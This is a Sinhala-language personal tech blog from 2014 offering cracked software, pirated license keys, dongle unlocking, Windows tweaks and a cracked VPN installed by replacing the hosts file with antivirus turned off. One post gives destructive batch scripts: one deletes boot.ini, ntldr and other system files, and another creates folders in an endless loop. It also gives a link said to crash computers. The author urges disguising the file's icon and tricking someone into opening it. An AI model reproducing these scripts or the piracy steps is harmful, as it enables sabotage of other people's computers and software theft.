• Gampola, Sri Lanka
  • It's a Secret
  • Buddhika Sandaruwan Senanayake
ඔයාලට ඕන ජිල්මාට් අරන් අපි එනවා හැමදාම 

Wednesday, December 31, 2014

DATA වලට Bill නැතිව Tv බලමු.

       හාහ්. ඔන්න ඉතින් පට්ට ජිල්මාට් එකක් ගෙනාවා. ආය ඉතින් ජෙමා                                    ලනු දෙන්නේ නැහැනේ....



 කෙලිම්ම බහිමුකො වැඩේට... ඇ. මේකයි PC / TAB / PHONE තුනෙම්ම් බලන්න පුළුවන්. හැබැයි පුතේ Dialog sim එකක් තමා ඕන කරන්නේ.. ඉතින් මේක දෙන්නේ Dialog එකෙම්ම තමයි ඇ. අනික තමා Free නොදෙන channel වලට දවසට Rs.3 වගේ සුළු මුදලකට දවසම බලන්න පුළුවන්.

මෙතනිම්ම ගිහින් එහෙනං බලන්න කෝ... Dialog Free Tv

ANDr01D Use කරන අය මෙතනින් ගිහින් App එක ගන්න 

එහෙනම් ජෙමා ගියා 




Tuesday, December 30, 2014

AVAST License Key till 2069

ඔය වයිරස් කියන ඒවා මහා ඇනයක් නේ බං. මටනම් ඉස්සර තිබ්බේ lap එක slow වෙන අවලම තමා. එක එක ජාතියේ කරුම එනවා ඉන්ටනෙට් එකට අවාම. ඉතින් එක එක එව්වා USE කලාට මොකද AVAST තමා මට දෙයියෝ දුන්නා වගේ හරි ගියේ ඇ. ඉතින් දැනටත් ගොඩක් අය මගෙන් Virus Guard ගැන අහනවා. avast ගත්තම අපිට free අවුරුද්දක් license ගන්න පුළුවන්. ඒත් වැඩක් නැ. Premium නෙමේ. ලොකු virus අහුවෙන්නේ නැ.  ඉතින් premium ගන්න 2069 වෙනකම්, මම දෙන්නම් ජිල්මාට් එක.




     ඉස්සෙල්ලම මෙතනින් ගිහින්    INSTALL AVAST  2015    කර ගන්නකො......

   Install ඉවර උනාට පස්සේ SETTING-REGISTRATION ගියාම 30 days trial කියලා දකින්න පුළුවන්

              After the installation  Go = SETTING-REGISTRATION  now u can see 30 days trial

එතන පල්ලෙහා තියනවා insert license key කියලා cord  ( NOT CorD ) නෙමේ. key කියන එකට යන්න

                  ඊට පස්සේ මේක          DOWNLOAD        කරගෙන  තියෙන text file එකේ key එක                                                  
                                                 COPY කරගෙන එතන Past කරන්න

                                          මේ පල්ලෙහා තියෙන්නේ මගේ avast එක ඇ.




එහෙනම් ජෙමා යනෝ............................................................................................................................




Dongle , Huawei Mobiles Unlock කර ගන්න ඕනද ? මෙන්න ජෙමාගෙන් ජිල්මාට් එකක් ...

ඔය ඉතින් ඩොන්ගල් එහෙම දැන් හැමතැනම unlock කරනවනේ. ඒ වුනාට ඒ ගැන තනියම කර ගන්න නොදන්න අය ගොඩක් ඉන්නවනේ. ඉතින් ඒ දන්නේ නැති අයට තමයි මේ භාණ්ඩය ගෙනාවේ අද. ඔන්‍න‍ උබල වෙනුවෙම්ම මගේ ගානේ ජිල්මාට් එක web එකට දැම්මා.

දැන් ඉතින් ඔය dialog , mobitel උන්ගේ dongle අරන් කඩවල් ගානේ සල්ලි වියදන් කරන්න එපා. මේක crack කරපු ජිල්මාට් එක හන්ද, ලේසියෙන් Huawei  mobile phn උනත් Unlock කර ගන්න පුළුවන්. ගින්නක් නැතිව. මම කියලා දෙන්නම්කො ඉතින් ඇ.

          ඉස්සෙල්ලම... හොඳ බබාලා වගේ   Download  කර ගන්නකො....


1. ඩවුන්ලොඩ් කරගත්ත ෆයිල් එක එක්ට්‍රැක්ට් කරගන්න.
2. dc-unlocker_client-1.00.0575.exe කියන එක ඉන්ස්ටොල් කරගන්න.
3. Install උනාම  finish යන්න ලබාදි dccrap.exe යන්න කොපි කරගන්න.ඉන්පසුව dccrap.exe කියන එක Open කරන්න.
                                  
                                     ඊට පස්සේ මේ පල්ලෙහා විදිහට පෙනෙයි 




1-.Select manufacture කියන එකෙන් ඔයාගේ  ඩොන්ගල් එකේ  නිශ්පාදිතය තොරන්න 

2-.Select Model කියන එකෙන්  Auto detect කියන එක select කරන්න 

3-.Detect Card කියන එකේ click කරාම ටික වෙලාවකින් ඔයාගේ දොන්ගලේ  imei number,model කියන දේවල් එයා auto detect  කරගන්නවා.

              එහෙම ඉවර වුනාට පස්සේ 

4 හි පරිදි Unlock කියන එක උඩ click කරන්න 

        දැන් ඔයා සාර්ථකව දොන්ගලේ UNLOck කර ගත්තා .


කියවපු ඔබ සැමට ස්තුතියි. ජෙමා යනෝ............

Sunday, December 28, 2014

Windows7 boot screen එක අලුත් කරමු

හැමදාම 7 on වෙද්දී එකම අර පාට පාට රවුන් හතරමයි කැරකෙන්නේ. මෙලෝ රහක් නැ දැකලම බං. අම්මපා මට ඕන උනා මේ රෙද්ද වෙනස් කරලා දාන්න. එහෙමයි කියල අපි කොහොම කරන්ටද ඇ. ඒත් නොකරත් බැ. අමාරුව වැඩි කමට කර ගත්තා වැඩේ. 
         
      අද ඉතින් හැමෝටම කියන්ටයි මේ සුදානම. හොම්බ දික් කරගෙන බලා ගන්නකො එහෙනං 


                                කොහොමද ඔය වගේ එකක් එද්දී ආතල් එක ඇ.

Saturday, December 27, 2014

Hide Folder පට්ට විදිහට

ගෙදර ආවම මල්ලිගෙන් හෙන වදේ, PC එක තාම පොරට දීලා නැ. ඒකත් ගලවලානේ වැඩට යන්නේ. මනුස්සයා තවම 8 වසරේ. ඉතින් ලැප දුන්නම මු ඔක්කොම ඔබනවා. එහෙම බැනේ. මට කියල දේවල් තියෙන හන්ද, මට ඕන උනා හොයා ගන්ටම බැරි වෙන්න folders හංගන්න,

      ඉතින් නොදන්නා උන්ට ජෙමා අද ගෙනාව. Crack එකත් එක්කම සුපිරි folder hide එකක්. ආය ඉතින් ලොවෙත් පේන්නෙවත් නැ.


Thursday, December 25, 2014

Uninstall කරමු එක File එකක්වත් නැතිවෙන්නම

මේ .. ඔහෙලා දන්නවයි? ඔය control panel එකෙන් uninstall කෙරුවට, ගොඩක් පොඩි පොඩි files නැති වෙන්නේ නැ. අන්න ඒකයි .. අපි අන්තිමට දාපු මගුලකුත් නැ. C එක full, Uninstall කරන්න එකකුත් නැ. 
එපා වෙනවනේ ඉතින්. මටත් ඕක හෙන පශ්නේ වෙලා තිබ්බේ. හැබැයි ජෙමා  හොයා ගත්තා පට්ට Solution එකක්. 

                                           මේකේ නම තමා   
                                         
                                           I0bit Uninstaller

Wednesday, December 24, 2014

DRIVERS ගින්නක් නැතිව UPDATE කර ගන්න

ගින්නක් නැතිව DRIVERS හොයාගෙන Update කරගන්න 

හායි ඉතින්, 
                ඔන්න ජෙමා අද ගෙනාවේ නියම බඩ්ඩක්. අපිට හැමදාම තියන අව්ලක්නේ අපේ computer එකේ os එකට ගැලපෙන drivers හොයන එක ඇ. ඉතින් එව්වා හොයාගෙන update කරලම දෙන බඩ්ඩක් තමා මේක. ආය මෙව්වගෙ licence ඕන නැ. crack කරලම ගන්න. 



Download වුනාට පස්සෙ  Internet Disconnect කරන්න.  Driver Genius software එක සාමාන්‍ය software එකක් install කරන ආකාරයටම install කරන්න නමුත් Software එක Open කරන්න එපා . ඊට පස්සෙ බලන්න ඔයා  software එක install කරගත් තැන crack Folder  එකක් ඇති, software එක  crack කරන්න නැතිනම් ඔයාට Drivers ටික update කරන්න බෑ.  Serial Key එකක් ඉල්ලනවා. ඒ නිසා software එක crack කරන්න වෙනව. Crack Folder එක ඇතුලෙ තියෙන මේ files  software එක install කරපු තැනට copy කරන්න (replace කරන්නද කියල අහයි. බය නැතුව replace කරන්න. )

දැන් Software 1 OPEN කරන්න 

Saturday, December 20, 2014

Internet භාවිතා කරනකොට ඇඩ් කරදරේ නවත්වමු.

Internet භාවිතා කරනකොට  ඇඩ් කරදරේ නවත්වමු. (Prevent unwanted Adds in browsers)


අපි කවුරු උනත් Internet යද්දී, කෙලවරක් නැතිව add එනවනේ. සමහර එව්වා නිසා ගොඩක් data යනවා. close කරාම වෙන එව්වා open වෙනවා. ඉතින් Google Chrome භාවිතා කරන අයට මේකෙන් ගැලවෙන්න ජෙමා ජිල්මාට් එකක් කියන්නම් අද.





ඉස්සර වෙලාම මේක අපි Chrome එකට add කර ගන්න ඕන 

එකට යන්න  මෙතැන click කරන්න


ඊට පස්සේ මේ පහල පින්තුරේ පෙනෙයි 



ඔතන දකුණු පැත්තේ උඩ FREE කියන button එක press කරන්න 

දැන් ඔයාට මෙහෙම පෙනෙයි 



දැන් ඉතින් add කරන්න 

ඊට පස්සේ ඔයාට ගෙවීමක් කරන්න page එකක් open වෙයි . ඒක close කරලා.. chrome restart කරන්න 

කොහොමද? බලන්න .. දකුණු අත පැත්තේ උඩින් ඔන්න ජිල්මාට් එකේ Icon එක පෙනෙයි. දැන් ගොඩ

ඕනම වෙබ් පිටුවකට ගියාම right click කරලා ඒ page එක හරි pics, videos, උනත් වෙන වෙනමම blokee block කරන්න පුළුවන් ඇ. 


                          එහෙනම් ජෙමා අදට යනවා. පට්ට නිදි මතයි අප්පා. ටටා



Friday, December 19, 2014

කොමාගේ දෙයියා වගේ වැඩ කරන්න

මේ අපි Android use කරනකොට , Root ගැන දන්නවනේ  Root කරන්නේ නැතිව Root Permission දෙන්නේ දෙන්නේ නැ. ඉතින් ඒ වගේ අය හිතාගෙන ඉන්නේ.. අපි අපේ කොමාගේත් ලොක්කා තමා කියල, එහෙම එකක් නැ. Windows වල හැම පහසුකමක්ම අපිට දෙන්නේ නැ. 

ඒ කියන්නේ අපිට ඕන හැම පහසුකමක්ම අපේ කොමා අපිට දෙන්නේ නැ. මේ ඉතින් කියන්නේ ඔන්න ඒකට
හොදම දේ. මේකට කියන්නේ GOD MODE ගෙදර ඉඳම්ම වෙන්න එහෙනම් කොමාගේ දෙයියා 

මේකයි කරන්න ඕන 

1. Desktop එකේ New folder එකක් හදා ගන්න 

2. දැන් පහළ CODE එක copy කරලා හදපු Folder එක Rename කරන්න .

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}


ඊටපස්සේ Control Panel එක  වගේ  Icon එක වෙනස් වෙනවා.. දැන් open කරලා බලපල්ලකො 

පිස්සු නේ.. තැන්ක්ස් පාරක්වත් දීලා පලයල්ලා ඇ..

මේ පහල තියෙන්නේ Screen Shot එක












හදන්න හදන වයිරස් එක නැති වෙන්නම.



                 

                                                        "DO AT YOUR OWN RISK"

ඔක්කොටම කලින් දැක්ක නේද ඔය දිලිසි දිලිසි රතු අකුරින් තියන එක. හරි හරි එහෙනම් වැඩේ මෙහෙමයි. අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික් කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.

සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..


3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු

මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..

@echo off
:top
md %random%
goto top 

මෙව්වා මාත් නෙට් එකෙන් හොයා ගත්තුවා ඉතින් අයිතිය මගේ නෙමේ. හැබැයි මමත් උත්සහ කරපුවා අමාරුවට. එහෙනම් ජය.

ඔන්න බ්ලොක් කරලා තියන ඕන සයිට් එකකට යන්ට

දැන් දැන් අපිට මචන් Software ගන්නවත් සමහර වෙබ් පිටු වලට යන්ට බැරි වෙලා නේද? ඉතින් මේක වෙන්නේ මෙහෙමයි. අපි හැමෝටම IP ඇඩ්රස් එකක් තියනවා. ඉතින් ලංකාවේ එකට තමා ඔය යන්න බැරි. හැබැයි අපිට පුලුවන්නම්, වෙන රටක ID එකකින් යන්ට, අව්ලක් වෙන්නේ නැ. එහෙම බඩ්ඩක් මටත් හම්බුනා. ඉතින් උඹලටත් කියන්ට හිතුනා ඇ.

ඉතින් ඔයාගේ IP adress එක මෙතනින් ගිහින් බලන්න
ඕක කාටවත් දෙන්න එහෙම එපා ඇ :D

මේකෙන් කරන්නේ අපිව නෙට් එකේ, Amarican කාරයෙක් විදියට පෙන්වන එක

ඉතින් මෙන්න බා ගන්න

මෙන්න බා ගන්න එක උඩ click කරන්න

මෙන්න මෙහෙම වැඩේ කරන්න



01.) මුලින්ම HSS-2.78-install-e-395-conduit කියන ෆයිල් එක උඩ ඩබල් ක්ලික් කරලා Hotspot Shield Elite දවස් 7තේ ට්‍රයල් එක ඉන්ස්ට්‍රෝල් කරගන්න.

02.) ඊට පස්සෙ Crack_by_-HacKrisH- කියන ෆෝල්ඩර් එකේ තියෙන Hosts කියන ෆයිල් එක අරගෙන මෙන්න මේ පාත් එකේ තියෙන Computer >>> C:/ drive >>> Windows >>> system32 >>> drivers>>> etc කියන ෆෝල්ඩර් එක ඇතුලට පේස්ට් කරන්න.


03.) දැන් ඉතින් ජීවිත කාලෙටම ඕක ගින්දර වගේ වැඩ.



වැදගත් : මේක ඉන්ස්ට්‍රොල් කරන කොට වයිරස් ගාඩ් එක ඩිසේබල් කරනවා නම් ගොඩක් හොඳයි. මොකද මේක ඉන්ස්ට්‍රොල් වෙන අතර මගදි සමහර ෆයිල් වයිරස් ගාඩ් එකෙන් බ්ලොක් කරන නිසා. අනිත් එක තමයි මේක ඉන්ස්ට්‍රොල් කරන්න පටන්ගන්න කොටම මොකක් හරි දෝශ පනිවිඩයක් ආවොත් retry button මත ක්ලික් කරලා ඉස්සරහට යන්න.    
මාත් මෙව්වා හොයලා දන ගත්තා මිසක්.. මගේ එව්වා නෙමේ ඇ. බලන්ටකෝ. පට්ට සාර්ථකයි.






Blogger Tips and TricksLatest Tips And TricksBlogger Tricks

Follow On facebook

අන්තර්ජාලයෙන් මුදල් උපයන්න කැමතිද? හරිම ලෙහෙසියි.ඇයි තවත් කට්ට කන්නේ

Get this gadget at facebook popup like box